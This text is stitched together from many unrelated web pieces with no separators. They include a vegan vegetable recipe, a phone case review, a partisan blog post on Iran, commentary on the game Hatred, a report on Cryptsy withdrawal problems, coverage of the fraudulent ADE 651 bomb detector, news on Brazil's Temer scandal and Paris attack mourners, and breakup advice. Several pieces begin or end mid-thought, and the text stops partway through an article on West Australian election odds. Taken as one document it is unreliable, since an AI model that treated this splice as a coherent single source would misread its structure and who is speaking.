I roasted just about everything in its raw form tossed with a small amount of oil, salt and pepper. The only exception was that I par-cooked the radishes. You can always use canned beets if you can't find fresh beets. Golden beets would be amazing in this dish as well. The vegetables used aren't set in stone. Use what YOU enjoy eating. I do want to mention that I did cook these on two separate sheet pans with items that would cook in similar amounts of time. For instance, the broccoli will cook much more quickly than the squash.
Who says vegan dinners are boring? I'll be making this one again and again 🙂
Before you go, why not check out some of our recent videos and be sure to subscribe to the YouTube Channel! 🙂
First let me say that the product works as advertised. Haven't had a problem with it since I received it.
The package came in two days. already impressed.
The product is right on spot when it comes to the description; adds grip to your phone, it's a snug fit, and a clear case for you to still appreciate the appearance of your Moto G (3rd generation) especially if you have used the Motorola website to customize the look of your phone.
*I have posted photos for reference:
-The Cut out for the headphone port and microphone (found at the top of your phone) & the charging port (found at the bottom of your phone) are big enough so you won't have any problems using a 3rd party cable.
-there is a "lay on the table" feature so you can place your phone on a table with the screen faced down without scratching it. I would still recommend a screen protector for more protection.
-speaking of protection, this is a silicon based case, meaning your phone will most likely be protected from scratches and light bumps, not drops.
the only con I have with this is that the power and volume buttons are also covered as supposed to an open cut out so they are a bit hard to press. not a dealbreaker though.
Overall, I like this case, and for the price; you really can't go wrong.
Highly recommended.
This is more of the poison fruit of Obama's disastrous nuclear deal. He shipped billions of dollars to the Islamic Republic, in the dark of night. Now, instead of there being peace, Iran is more bellicose and belligerent than ever.
“Tehran threatens US bases as Trump reshapes Iran strategy,” Reuters, October 8, 2017:
BEIRUT/DUBAI – Iran warned the United States against designating its Revolutionary Guards Corp as a terrorist group and said U.S. regional military bases would be at risk if further sanctions were passed.
The warning came after the White House said on Friday that President Donald Trump would announce new US responses to Iran's missile tests, support for “terrorism” and cyber operations as part of his new Iran strategy.
“As we've announced in the past, if America's new law for sanctions is passed, this country will have to move their regional bases outside the 2,000 km range of Iran's missiles,” Guards' commander Mohammad Ali Jafari said, according to state media.
Jafari also said that additional sanctions would end the chances for future dialog with the United States, according to state media, and issued a stark warning to American troops.
“If the news is correct about the stupidity of the American government in considering the Revolutionary Guards a terrorist group, then the Revolutionary Guards will consider the American army to be like Islamic State all around the world particularly in the Middle East,” Jafari said….
If video games are going to be taken seriously as a creative medium, then the community needs to welcome developers from varied backgrounds, and with opposing points of view. Sometimes, that means reexamining what really constitutes a game, or putting up with a title that's ideologically repellent. For the sake of expanding the community, if gamers are going to welcome games like Gone Home into the fold, they're going to have to put up with things like Hatred as well.
That doesn't mean that everyone has to like it, of course. Epic Games had every right to remove their logo from Destructive Creations' upcoming massacre-simulator, which casts players as an “Antagonist” and asks them to brutally murder as many innocent people as possible. It's one thing to tolerate a game; it's another entirely to endorse it.
Soon, players will get their own chance to protest Hatred's stylish brand of ultra-violence. Hatred comes out on June 1st, at which point players can promptly decide not to buy it. Internet outrage makes for good headlines, but if gamers really want to send a message, they need to hit Destructive Creations where it hurts: in the wallet. (Notably, Hatred was supposed to come out May 19th, but Destructive Creations delayed the game because “honestly speaking we will be playing The Witcher 3 then.”)
Hatred isn't the first game to use over-the-top violence as a marketing hook, and it probably won't be the last. Postal and Manhunt rose to fame because of their political incorrectness, not their gameplay, and to the general public Mortal Kombat is more about gruesome fatalities than a mechanically sound fighting game. Still, with those titles, there are (arguably) strong games underneath the blood-soaked aesthetics. With Hatred, the jury's still out.
That's really getting to the crux of the controversy surrounding Hatred. Despite all of Destructive Creations' talk about creating “a pure gaming pleasure,” to many observers Hatred doesn't really look that fun. Destructive Creations tells players not to take Hatred seriously, but the game's marketing materials take themselves too seriously. It's an inconsistent message that doesn't come across as wholly genuine; that makes the game's violence look like a callous marketing ploy, not a creative choice. There's no such thing as bad press, after all, and if Hatred hadn't been controversial, it likely wouldn't have gotten any attention at all.
Was Gabe Newell right when he put Hatred back on Steam Greenlight, after well-meaning but overzealous staffers removed it? Absolutely. Does that mean it's going to be a good game? Not at all. It's important that developers feel empowered to release the games that they believe in; it's also important to remember that absolutely nobody has to buy them.
Hatred comes out June 1, 2015 for PC.
Cryptsy, one of the biggest altcoin cryptocurrency exchanges has experienced withdrawal and other problems for a long time. If you are not a complete crypto-novice there is a high probability you have gone through, heard of or read about their strange behaviour towards customers (see here, here, here or here and here). Cointelegraph have sent some questions by e-mail but without any response.
Here are just a few complaints published on forums about a year ago...:
“When I try to withdraw my Doge I'm not getting sent a SMS code for 2-factor authentication, though it works fine when loggin in…” “I just tried to move my Doge and BTC out of Cryptsy, but I'm having a hard time doing so as my 2-factor authentication code is not being sent to my phone.”
...and recently:
“I sold all my alts into BTC, bought Doge and now I'm out after a five day pending on LTC and Dash. The Doge was withdrawn in under an hour.” “I contacted customer report over and over again only to receive the same exact bot replied email. And then they kept telling me that my ticket has been closed and my issue is resolved. So all my Bitcoins are basically gone.” “I had a 0.01 BTC transaction go through after around 15 hours of waiting. 12 days now on a 0.8 transaction.” “I was able to eventually withdraw my BTC from one of my accounts for a sum of 1.4BTC. It took about 3 weeks and 2 tickets.” “I have been playing with Cryptsy for a couple months, have heard this and was hoping it was wrong. I was able to trade out of some altcoins and get BTC sent. But as of yesterday I have not heard a word (have a ticket in) and have not received the 3 BTC that I am owed... Looks like it's over…”
Remember Mt.Gox
There are many users saying Cryptsy has never done them any damage, only put them through a lot of minor faults, slow functionality and terrible customer service, suggesting only sloppiness and a lack of professionalism. It appears the crypto-exchange has still had substantial trading volume and therefore was used widely by traders and speculators. And some of them were already prepared for the worst case scenario.
There has been a price premium for some altcoins compared to other exchanges. For example the Dogecoin 35% higher than elsewhere. Why? The reason could be that some altcoin payouts have continued as reported in forums. But dealing with an exchange facing problems is risky. Sure, you can buy elsewhere and sell on Cryptsy to make a profit using arbitrage. Up until the moment when you're unable to withdraw those funds from the exchange wallet. Remember Mt.Gox?
Speculation: A Possible Hack
The warning came only a few months after Cryptsy had started. One customer was able to withdraw 2 BTC more than planned and he contacted them right after. Another warning two years ago when a user mistakenly withdrew 60 BTC but returned the funds immediately. Is it too much of a stretch to suggest there might have been a successful hacker's attack with far more BTC stolen? So much that the exchange has been forced to play these ugly games with customers?…
“My condolences goes to anyone who is affected by the events that are taking place at Cryptsy. While I understand that dedicated traders usually have a huge portfolio of crypto coins stored on exchanges. People should have learned by now that cryptocurrency exchanges are not a place to store your digital assets. Traders unfortunately have no other choice if they want to trade but still entrusting your cryptocurrency with a third party is simply just begging for another Mt.Gox type drama,” Jure Pirc shares his personal view for CT.
He doesn't want to speculate and guess if what is going on at Cryptsy is an inside job or an actual hack and theft from a third party. “Cyber crime is not going to disappear in fact it's going to be a huge challenge for any company that stores customer funds in the years to come. I personally am not a trader so I've never kept any coins on the Cryptsy exchange I do however have an account there and at the present time have no issues with logging in. For the sake of CT readers I will initiate a small BTC deposit, trade and withdraw and will post an update in the comments later on. Again to all of those that are affected by the unclear situation at Cryptsy a reminder not to use cryptocurrency exchanges as your personal coin vault.”
Evidently, Cryptsy swamps not only individuals but also other crypto-businesses. One of them is a smaller european exchange Litebit.eu. “We've had a good experience with Cryptsy in the past but last two or three months it's been a disaster. Withdraws are not coming through, support not answering. We have stopped trading with them,“ founder Kenny Rokven told Cointelegraph.
We hope that you liked this article. We recommend you get acquainted with our ratings of the top blockchain companies and cryptocurrencies.
The British Embassy offered to cooperate with any Iraqi government investigation.
The New York Times first reported official doubts about the device in November, citing American military officials and technical experts who said the ADE 651 was useless, despite widespread reliance on it in Iraq.
The ADE 651 is a hand-held wand with no batteries or internal electronic components, ostensibly powered by the static electricity of the user, who needs to walk in place to charge it. The only moving part is what looks like a radio antenna on a swivel, which swings to point toward the presence of weapons or explosives.
“We are conducting a criminal investigation and as part of that a 53-year-old man has been arrested on suspicion of fraud by misrepresentation,” a spokesman for the Avon and Somerset Police in England said, without giving the suspect's name in line with police policy. The suspect was released on bail, the spokesman said.
“The force became aware of the existence of a piece of equipment around which there have been many concerns and in the interests of public safety launched its investigation,” the police spokesman said.
The suspect's identity was widely reported in the British press as Jim McCormick, managing director of ATSC Ltd., which operates out of a converted dairy in rural Somerset County, England. News reports described Mr. McCormick as a former British police officer from Merseyside.
Photo
Contacted by telephone, Mr. McCormick refused to comment on the charges or the case against him, but he insisted that ATSC would remain in business. “Our company is still fully operational,” he said.
A statement issued by the British Department for Business, Innovation and Skills said it was banning export of the ADE 651 and similar devices to Iraq and Afghanistan.
Advertisement Continue reading the main story
“Tests have shown that the technology used in the ADE 651 and similar devices is not suitable for bomb detection,” the department said. “We acted urgently to put in place export restrictions which will come into force next week.” The statement said the department could ban export to those countries because British troops there could be put at risk by the device's use. ATSC claims to have sold the device to 20 countries, all in the developing world.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
The Supreme Board of Audit in Iraq announced it would investigate the procurement of the ADE 651, according to the board's leader, Abdul Basit Turki. The investigation will focus on officials who previously assured auditors the device was technically sound, he said.
Maj. Gen. Jihad al-Jabiri, who is in charge of procuring the devices for the Ministry of Interior, could not be reached for comment.
In Baghdad on Saturday, the devices were still very much in use. “I didn't believe in this device in the first place,” said a police officer at a checkpoint in central Baghdad, who spoke on the condition of anonymity because he was not authorized to speak to the media. “I was forced to use it by my superiors and I am still forced to do so.”
Another checkpoint officer said he blamed corrupt officials for bringing the ADE 651 in. “Our government is to be blamed for all the thousands of innocent spirits who were lost since these devices have been used in Iraq,” he said.
An associate of ATSC, who spoke on the condition of anonymity for fear of retaliation, said the devices were manufactured at a cost of $250 each by suppliers in Britain and Romania. “Everyone at ATSC knew there was nothing inside the ADE 651,” he said.
The Iraqi government, according to its auditors, paid $40,000 to $60,000 for each device, although it determined that ATSC was marketing the device for $16,000. The additional money was said to have been for training, spare parts and commissions.
The Times of London quoted Mr. McCormick in November as saying that the device's technology was similar to that of dowsing or divining rods used to find water. “We have been dealing with doubters for 10 years,” he said. “One of the problems we have is that the machine does look primitive. We are working on a new model that has flashing lights.”
Shortly after the arrest on Friday, the BBC reported that it had arranged a lab test of the device and found that its bomb-detection component was an electronic merchandise tag of the sort used to prevent shoplifting.
ATSC's brochures claim the ADE 651 can detect minute traces of explosives, drugs or even human remains at distances of up to 6 miles by air, or three-fifths of a mile by land. Scientific trials of similar devices have shown that they are no more accurate than a coin toss.
(KUTV) Utah drivers who want to declare "In God We Trust," on their car's license plate may soon be able to do so without paying an extra $11 fee.
A proposal from a state lawmaker could cost Utah about $34,000 a year that it currently receives for those paying to display the plates. In addition, Utah would need to produce a template to manufacture the plates that will cost around $100,000, according to a committee of lawmakers meeting Tuesday. The proposal would make the plate the third standard plate along with the current Ski Utah plate and the Life Elevated plates that display the world famous Delicate Arch.
Utah began offering plates in 2013 that feature the motto "In God We Trust" and an American flag.
A number of other states offer a similar design as a specialty license plate but only a handful of states, including Florida and Indiana, offer them to drivers without an extra fee.
The plate is the third most popular Utah specialty plate. The University of Utah is the most popular of the state's special group plates. There are more than 50 such plates available in Utah, including plates for veterans, colleges and wildlife. on the DVM website.
A committee of lawmakers passed the measure 10-0, sending the bill to the entire House for debate and a vote.
Please enable Javascript to watch this video
INDIANAPOLIS, Ind. – Family and friends of a murdered Indianapolis man are begging anyone who knows anything about the crime to please come forward.
On Monday afternoon, a group of fishermen finds Kobi Walden's body behind an apartment complex on the city's south side.
“We are shocked and we are devastated. I know I'm never going to recover from this,” said Kala Klein, Walden's sister.
Walden played on the Race City Rebels, an Indianapolis roller derby team. Thursday night was the first practice without No. 47.
Investigators say Walden's body was along a creek, tucked away in the woods and wasn't easy to see. The 31-year-old was shot to death. Three days later, friends and family wonder who killed Walden and why.
“It's senseless. It's unfortunate. There's no one if they ever knew Kobi would do something like this,” said Ron Eich, Walden's teammate.
Now teammates have to adjust to life without him.
“It's tough. It's going to be hard for a while,” Eich said. “Kobi was the type of guy who comes in and has all the energy. He has an infectious smile. He loves the game. He wants to get better he just brought everyone's level up.”
Walden's sister says her brother was never in any kind of trouble or involved in the wrong crowd. She told FOX59 she didn't just lose her brother, she lost her best friend and her daughters lost a great uncle.
“I know that I won't stop until I know who did it and I know why because I have to know why my brother died,” said Klein.
As investigators work on solving this case, Walden's real family and his roller derby family hope closure is close.
“The tough part is there isn't a guarantee that we will ever know. I don't think anyone will ever truly know why and I hope his family gets justice,” said Eich.
The Race City Rebel's next game is on May 13 at Perry Park. The team is planning to do a memorial for Walden. There is a GoFundMe page set up to help with funeral costs.
If you know anything that could help investigators with this case, call Crime Stoppers at (317) 262-TIPS.
1. Write down why it didn't work and the ways you weren't happy and keep that list with you. Read it when you inevitably start thinking of all the reasons why you miss them, and why they were so perfect for you. We all romanticize the love we once had, but if and when we get it back, we realize that it's just the same as it was. When it comes to the past, nothing changes but how we view it. Be conscious of that.
2. Learn to differentiate between love, lust and attachment. Now, I'll argue that love actually is a deep form of attachment, but in many ways, these three can be different, unique experiences that don't add up to enough cause for spending the rest of your life with someone. It's okay to be in lust. It's okay to be attached. You don't have to be forever though.
3. Realize that relationships aren't supposed to make you feel good as much as they are supposed to teach you something, and to help you grow. Allow someone to be part of your story and not the tragic, final scene. Take from it what you need to learn. If it showed you all the unloving parts of yourself, work on those, that's what it was supposed to do. We have a tendency to exacerbate relationships by the way in which we categorize them as good bad or ugly, and yet, for some reason, no matter which way we go, we always want to hold on for just a little bit longer.
4. Cut off all contact. You can't pick and choose right now, and it's great if you can get into a friendship one day, but until your feelings have faded, you need to take some distance. This is absolutely essential. Stop checking their social media, don't ask friends about how they're doing. You don't have to be a jerk about it, and you can politely let them know that it's best for you to take some time away from them (although it usually doesn't go that smoothly) it's important that it's said and followed through with regardless.
5. Let yourself be sad. Resisting it makes it worse than it is. Give yourself time to mourn and grieve the loss of someone who was a big part of your life. Then let them go, and love yourself enough to let yourself go too. As in, let yourself walk away from them in the metaphorical sense. Nobody else will give you permission.
6. Don't get frustrated when your thoughts inevitably keep drifting back to that person. Just let them recess and pass. This is really how you should deal with all of your negative thoughts, but doing so becomes increasingly difficult when the subject matter is something you want to cling onto like an addict. You have to embrace the fact that letting those thoughts wash over you and fade is the best thing you can do for yourself and for your post-relationship relationship.
7. Don't expect to get over them if you're sitting in your bed all day thinking about them. Get out and do what you love, go visit friends you've lost touch with. Fall in love with other things and people and yourself. There are more loves in your life other than just romantic, and when you learn to enchant yourself with them, you find yourself needing a significant other less and less.
8. Embrace that you may never get over them, but let them be a part of your story anyway. Not every love has to result in a vow to spend forever together, and it doesn't mean that what you had wasn't real or worthwhile or beautiful. Part of the story can be that you simply always loved them, even long after you were over, and you know what? If you ask me, no matter how it turns out in the long-run, that is the most beautiful thing you can experience: loving someone despite everything. The only catch is, you have to be able to do it in an accepting way, or you'll bury yourself in your heartache for the rest of your life.
9. Start to detach yourself. Something we all have to come to terms with is the fact that we attach ourselves to other people in light of what we think they can provide for us– whether it's subconscious or not, we go into near panic mode when they leave us because we don't know how we'll get by. But we will, because we always do.
10. Learn to take your feelings and channel them into fuel to propel you toward something greater. If anything, motivate yourself to succeed in spite of them. It's not the most positive way of going about things (and I do believe you should really do things for yourself) but for now, while you're struggling, it's not the worst way to cope. Let them do what they came into your life to do: make you better, however doing so played out.
A girl lights a candle November 15, 2015 in front of a broken window at "Le carillon" restaurant, site of one of the November 13 jihadist attacks that has galvanized Paris and the world (AFP Photo/Loic Venance)
Paris (AFP) - "Why are the people crying, Mummy?" a little girl out for a Sunday afternoon cycle with her parents asked, as she passed the crowds gathered on the street corner where the killing began in central Paris.
"They are very sad," her mother said as she tried to navigate the groups standing silently and awkwardly facing the Petit Cambodge restaurant and the Carillon cafe, trying not to look at the patches of bloodstained sand on the pavement where the 14 people who died there fell.
"But why are they sad?" the girl persisted.
"Because there are no answers," said Benedicte Joffre, who was there with her 11-year-old son. "And because this time we are more afraid."
She had come to this corner of the 10th arrondissement near the Canal St Martin that is the acme of a trendy multicultural Paris of halal butchers, hipster hangouts and Jewish synagogues because she was feeling the same "unbearable sadness" into which the French capital has been plunged.
"This time it is different," she said referring to the Charlie Hebdo and kosher supermarket attacks in January. "It is much wider, it is about terrorising us all."
"In January they attacked a certain idea of freedom, the freedom of the press but this time it is our whole society that they have attacked," she said.
- 'Muslims must protest' -
Across the canal at Place de la Republique, which became the symbol of France uniting in the face of the earlier killings, there were tears, steely defiance -- but also fear.
That jittery atmosphere turned to panic at the monument later in the evening after firecrackers sent scores of people fleeing, a police source told AFP.
Flowers and tributes left outside the Carillon cafe were also trampled in a false alert there, while in the Marais district there were similar scenes when an Australian tourist spotted an armed man who turned out to be a plainclothes policeman.
Helene Lagoutte had earlier brought her four-year-old daughter Jeanette to the Place de la Republique to watch people light candles and write messages at the foot of the giant statue of Marianne, the female figure who embodies the secular values of the French republic.
"I have explained to my daughter that people who were angry with France came and killed people and that it was wrong. I wanted to talk to her first because kids talk at school.
"I have tried to talk to my older boys too about Islam, and what happened in Algeria (a former French colony) because a lot of my 12-year-old's friends are Muslim and I didn't want him to think that they were to blame."
She said France was more traumatised by these killings not just because more people had died than in January, but because the jihadists had targeted "all of us", not just the Jewish community or journalists who had angered them.
"That is why we must stand together, and why I would appeal to the Muslims of France and to their leaders to speak out and to demonstrate in the streets against this, to show that this is not them. They must. If not, I am afraid to think what will happen."
Half overhearing what was being said, Mehdi, 43, a Paris binman, began to cry. "I am so ashamed. I don't know how I am going look my colleagues in the eyes. But they must know this is not what it is to be a Muslim. I just want to hold them and to say I feel the same" as them.
- 'We are French too' -
He said he was afraid of what these attacks would do to the France in which his children were growing up as third-generation immigrants. "We are French too, we are," he insisted.
He said neither he nor his wife had slept more than an hour since Friday. "I couldn't put off the television and I am so upset and angry. My wife was crying in the bed beside me, saying she is going mad. I just had to get out of the house."
This will not be the end of the bloodshed, Meir, an Orthodox Jew whose family survived Auschwitz, warned, as heads turned at the sound of police sirens.
"This will not be the last (attack). They will keep on attacking us," he said.
Benedicte Joffre, who said she was the great grand niece of France's World War I military leader, General Joffre, said the nation's democratic values were worth fighting for. "It is what our ancestors did and we have to, too."
But she was afraid that reaction to the attacks might deepen social division in France by "helping the extremes in our country. It is manna from heaven for the (far-right) National Front. It is easy to say it is their (Muslims') fault.
"Although the attacks are an act of war, we are not at war," she insisted.
Ever feel embarrassed when you don't know how to say a word? Don't be. Even the most fluent English speakers—and, ahem, political figures—stumble. Besides, pronunciations change over time. See if you've been mispronouncing these common words.
1. Seuss
Pen names don't always make things easier. Theodore Geisel's college buddy Alexander Liang made a rhyme to teach you the right way to pronounce it:
"You're wrong as the deuce/And you shouldn't rejoice/
If you're calling him Seuss/He pronounces it Soice" (or Zoice).
2. Kibosh
Let's put the kibosh, pronounced "KY-bosh," on saying this word like "kuh-BOSH."
3. Celtic
An initial hard (k) sound is the standard, but linguists say the (s) sound emerged as far back as the 17th century. Still, you'll sound ridiculous (but correct!) if you bring that hard (k) to a Boston Celtics basketball game.
4. Comptroller
This word sounds just like "controller." If you're tempted to pronounce that silent (pt), please comptroll yourself!
5. Cache
Maybe it's because it's one letter short of "cachet." Maybe it's just more fun to mispronounce. This word sounds just like "cash."
6. Chicanery
This word meaning "deception by trickery" is aptly tricky to pronounce. The beginning (ch) sound is "sh," as in "Chicago." The French pronounce the word "shih-connery," which makes it easy to remember the definition. However, Americans love a long (a) and tend to pronounce it "shih-cane-a-ree." Choose your own adventure.
7. Banal
You'll be the butt of the joke if you pronounce this "BAY-nul." It's "buh-NAHL."
8. Affluent
If pronouncing it "a-FLU-ent" is wrong, some people don't want to be right. The stress on this word is supposed to be on the first syllable—"AFF-lu-ent." But stressing the second syllable became so mainstream that dictionaries started validating the pronunciation in the 1980s.
9. Forbade
Pronunciation quirks and mistakes happen when people try to read and speak by the rules. Too bad the English language doesn't always make sense. The past tense of "forbid" was originally supposed to be spelled and pronounced "for-bad." But then people started spelling it "forbade" and rhyming it with "made." Now linguists say the word sounds archaic any way you say it. Most people use "forbid" as a past or present-tense verb.
10. Boatswain
Okay, so maybe this word's not that commonly used. But now that you know it's pronounced "bo-sun," you might find more reasons to work it into conversation.
11. Niche
When this word was borrowed from French in the 17th century, it was quickly Anglicized to rhyme with "itch." But in the 20th century, more people embraced a true French pronunciation and decided to pronounce it "neesh." Both are correct.
Trump jokes about exercise band that blinded Harry Reid in one eye
CLOSE Senate Minority Leader Harry Reid chastised Donald Trump on Friday for joking about an accident that blinded Reid in one eye. USA TODAY
WASHINGTON — Senate Minority Leader Harry Reid chastised Donald Trump on Friday for joking about an accident that blinded Reid in one eye.
"Donald Trump can make fun of the injury that crushed the side of my face and took the sight in my right eye all he wants — I've dealt with tougher opponents than him," Reid said in response to Trump's "toxic comments."
Reid, D-Nev., a fierce critic of Trump's, was referring to remarks that the Republican presidential nominee made in an interview with The Washington Post that was posted online Thursday night.
The Post reporter told Trump that Reid had said that Trump is "not slim and trim."
"Harry Reid? I think he should go back and start working out again with his rubber work-out pieces," Trump was quoted as saying.
Reid was exercising with a rubber resistance band in his bathroom on New Year's Day 2015 when the band reportedly broke or slipped from his hands, causing him to spin around and strike his face on a cabinet. Reid lost vision in his right eye and suffered a concussion, broken orbital bones, and a broken rib.
"I may not be able to see out of my right eye, but with my good eye, I can see that Trump is a man who inherited his money and spent his entire life pretending like he earned it," Reid said. "In Searchlight (Nevada), we learned a thing or two about hard work that Trump may not have learned at his boarding school."
Trump made his remarks the same day that Reid took to the Senate floor to blast Trump as "a spoiled brat" and "a human leech who will bleed the country."
Read or Share this story: http://usat.ly/2csuoy5
BRASILIA (Reuters) - Brazilian President Michel Temer gave his blessing to an attempt to pay a potential witness to remain silent in the country's biggest-ever graft probe, according to plea bargain testimony by a powerful businessman, newspaper O Globo reported on Wednesday.
Temer's office on Wednesday acknowledged he had met in March with the businessman, Chairman Joesley Batista of meat giant JBS SA (JBSS3.SA), but denied any part in alleged efforts to keep jailed former House Speaker Eduardo Cunha from testifying.
O Globo's report, which three sources familiar with the matter said was accurate, threatened to pull Temer into a corruption scandal that has already entangled several of his closest allies and advisors.
Leading lawmakers and a third of Temer's cabinet have already been caught up in an investigation of systematic bribery in return for political favors and contracts with state-run enterprises. But news that the president himself may have been party to a cover-up shook the scandal-weary nation.
Investors dumped Brazilian assets in foreign markets after the news broke late in Brazil, as the prospect of Temer becoming enmeshed in a fresh political crisis clouded the prospects for his unpopular reform agenda, considered key to ending a deep recession.
Scattered protests sprang up in front of the presidential palace and along São Paulo's main avenue as opposition lawmakers and even a high-profile ally called for Temer to step down.
“Given the gravity of the situation and the responsibility to keep Brazil from plunging into the imponderable, the only option is for President Michel Temer to resign,” said Senator Ronaldo Caiado, leader of the government-allied Democratas party in the Senate.
JBS, the world's biggest meatpacker, declined to comment. A senior JBS executive said there had been no formal communication about the matter within the company.
While the O Globo report described an unprecedented sting operation mounted by Brazil's federal police in conjunction with senior JBS executives to snare several politicians, Temer was the one target that towered over the rest.
Batista used a hidden device to record an alleged discussion with Temer about hush money the executive was paying to Cunha, according to the newspaper. The report did not say what Cunha was asked to keep quiet about.
When Batista told Temer he was paying Cunha to remain silent, the president was recorded saying, “You need to keep that up, okay?” according to the newspaper, which did not say how it had obtained the information.
Cunha, once a powerful member of Temer's ruling party, has previously said he had compromising information about several senior politicians linked to a vast political bribery scandal at state oil firm Petroleo Brasileiro SA, or Petrobras (PETR4.SA).
O Globo reported that Batista and his brother, JBS Chief Executive Wesley Batista, presented the recording to prosecutors as part of plea bargain negotiations underway since March.
Temer's office said in a prepared statement that he “did not participate in or authorize any activity with the aim of avoiding a plea bargain or collaboration” by Cunha, adding that the president supported a full investigation of the allegations.
Demonstrators protest against Brazil's President Michel Temer in São Paulo, Brazil, May 17, 2017. The banner reads: "Out Temer." REUTERS/Nacho Doce
BRAZIL ASSETS TANK
An exchange-traded fund tracking Brazil's benchmark Bovespa stock index .BVSP fell more than 8 percent in Tokyo, while American depositary receipts for Petrobras fell as much as 11 percent in after-hours New York trading as investors ditched Brazilian assets at the sight of more political turmoil.
Despite his extreme unpopularity among Brazilian voters, Temer has maintained a broad majority in Congress, but analysts said public outrage over the scandal could change the political equation.
“If the recordings are confirmed, Temer would have to defend his mandate on multiple fronts,” said political analyst Thomaz Favaro of the consultancy Control Risks, citing the danger of public pressure for Temer's resignation, lawmakers' calls for impeachment and a possible investigation by the nation's top prosecutor.
“The development thus substantially increases the risk of an unscheduled government change in Brazil before the 2018 general elections,” Favaro told clients in a note.
The crisis underscored the extent to which Brazil's political agenda is being dictated by an increasingly fearless generation of corruption-fighting police and prosecutors.
With the collaboration of the Batista brothers, police used hidden cameras and tracking chips in bags of cash to record a series of bribes to politicians, according to O Globo.
In one case, the paper said Temer was recorded suggesting Congressman Rodrigo Rocha Loures could resolve an unspecified issue for the holding company of JBS. Loures was then filmed receiving 500,000 reais ($160,000) sent by Joesley Batista.
Slideshow (5 Images)
Representatives for the congressman said he would clarify the matter when he returned on Thursday from a trip to New York.
Senator Romero Juca, the head of the government's coalition in the Senate, said the accusation was one of many that would be investigated, but it would not slow Temer's ambitious reforms.
The JBS executives' plea bargain agreement, including a fine of 225 million reais ($72 million), is being overseen by Supreme Court Justice Edson Fachin, who is responsible for the bribery investigation known as Operation Car Wash, according to O Globo.
Let's begin with Benjamin Netanyahu's Iran logic. He portrays a rampaging Islamic Republic that “now dominates four Arab capitals, Baghdad, Damascus, Beirut and Sana,” a nation “gobbling” other countries on a “march of conquest, subjugation and terror.” Then, in the same speech, he describes Iran as “a very vulnerable regime” on the brink of folding.
Well, which is it?
The Israeli prime minister dismisses a possible nuclear accord, its details still unclear, as “a very bad deal” that “paves Iran's path to the bomb.” He says just maintain the pressure and, as if by magic, “a much better deal” will materialize (thereby showing immense condescension toward the ministers of the six major powers who have been working on a doable deal that ring-fences Iran's nuclear capacity so that it is compatible only with civilian use). Yet Netanyahu knows the first thing that will happen if talks collapse is that Russia and China will undermine the solidarity behind effective Iran sanctions.
So, where is the leverage to secure that “much better deal”?
Netanyahu lambastes the notion of a nuclear deal lasting 10 years (President Obama has suggested this is a minimum). He portrays that decade as a period in which, inevitably, Iran's “voracious appetite for aggression grows with each passing year.” He thereby dismisses the more plausible notion that greater economic contact with the world and the gradual emergence of a young generation of Iranians drawn to the West — as well as the inevitable dimming of the ardor of Iran's revolution — will attenuate such aggression.
With similar sleight of hand, he dances over the fact that military action — the solution implicit in Netanyahu's demands for Iranian nuclear capitulation — would likely set back the Iranian program by a couple of years at most, while guaranteeing that Iran races for a bomb in the aftermath.
Snow cones in a snow storm? Yes please!
The National Weather Service issued a winter storm warning for Mauna Loa and Mauna Kea, two of Hawaii's tallest volcanoes, after a blanket of snow fell on their summits overnight and heavy bursts continue.
While visitors laze on Big Island beaches below, “significant amounts of snow” are expected to continue through the weekend at altitudes above 11,000 feet. Snowfall could pile up some 20 to 30 inches through Saturday, local news station Hawaii News Now reports.
Hmm, this isn't quite the sandy paradise we usually see in photos:
First snow of the season observed today on Hawaii's Mauna Loa volcano https://t.co/EFi1JNAZS8 pic.twitter.com/Hi9496hJW1 — newszbreakinwx (@newszbreakinwx) December 2, 2016
Snow actually isn't an entirely rare sight in Hawaii: The islands' volcanic peaks can get snow or rain at any time of year, including July.
But of course, visitors and locals often make a point to play in the fall whenever possible. The summits of Mauna Loa and Mauna Kea are currently closed due to this week's snowstorm, but when things subside, it won't be a surprise to see snowboarders and skiers taking to the makeshift slopes.
Check out some photos from a 2009 snowstorm on Mauna Kea:
Icon Sports Wire via Getty Images
Icon Sports Wire via Getty Images
Icon Sports Wire via Getty Images
WA election: bookies back Labor for poll victory
Updated
If bookmakers are to be believed, West Australians will be waking up on March 12 with a new Labor Government to lead them for the next four years.
Odds listed by every mainstream bookmaker has the Opposition as a strong favourite to defeat a Liberal-National Government seeking a third term.
But how much should people read into the odds?
It is far from uncommon to hear political observers point to the betting markets as a predictor of election outcomes, with a belief in some circles that the flow of money from wagers best indicates what will happen when people go to cast their votes.
While that belief certainly is not universal — and there are a couple of famous and recent failures — numerous studies indicate betting markets are more reliable predictors of electoral outcomes than polls or pundits prove to be.
Just under two months from election day, numerous bookmakers have already released their election markets — with one even allowing bets to be placed on individual seats.
One very clear trend from the betting agencies, as it stands, is that Labor is the favourite.
But how likely is the Liberal-National Government to be defeated, according to the market?
For best results, we took odds from five betting agencies on January 11, two months out from the election.
The most confident of a Labor win gave the Opposition odds of $1.22, while the least certain offered a return of $1.38 for each dollar wagered.
Then, we put those through a series of adjustments (explained at the bottom of this article), which leave us with the same probability implied by the raw odds but in an easier-to-digest percentage.
After that, we have the percentage chance of either a Liberal-National or Labor win.
Here are the results:
Government's chance of winning (%) Labor's chance of winning (%) Bookmaker 1 23.37 76.63 Bookmaker 2 27.65 72.35 Bookmaker 3 26.47 73.53 Bookmaker 4 29.36 70.64 Bookmaker 5 32.24 67.76
The Government has as little as a 23 per cent chance of winning a third term, according to one bookmaker market, but another suggests the probability is almost one-in-three.
Labor's chance of winning, according to the agencies, is somewhere between 67.76 and 76.63 per cent.
Odds point to Labor victory
Averaging out the odds from the five bookmakers, the markets imply Labor's chance of winning is 72.2 per cent, with the Government at 27.8 per cent.
Turning to the seat-by-seat markets, using the same process as before, it is possible to calculate the implied probabilities as a percentage form.
The market considers Labor likely to hold all 20 seats on its side of the pendulum — its lowest probability to hold one of its own electorates is 66 per cent.
But the Opposition needs to win 10 another seats which are either notionally Liberal, following a redistribution, or currently held by a Government MP.
These are the 10 the betting market considers most likely:
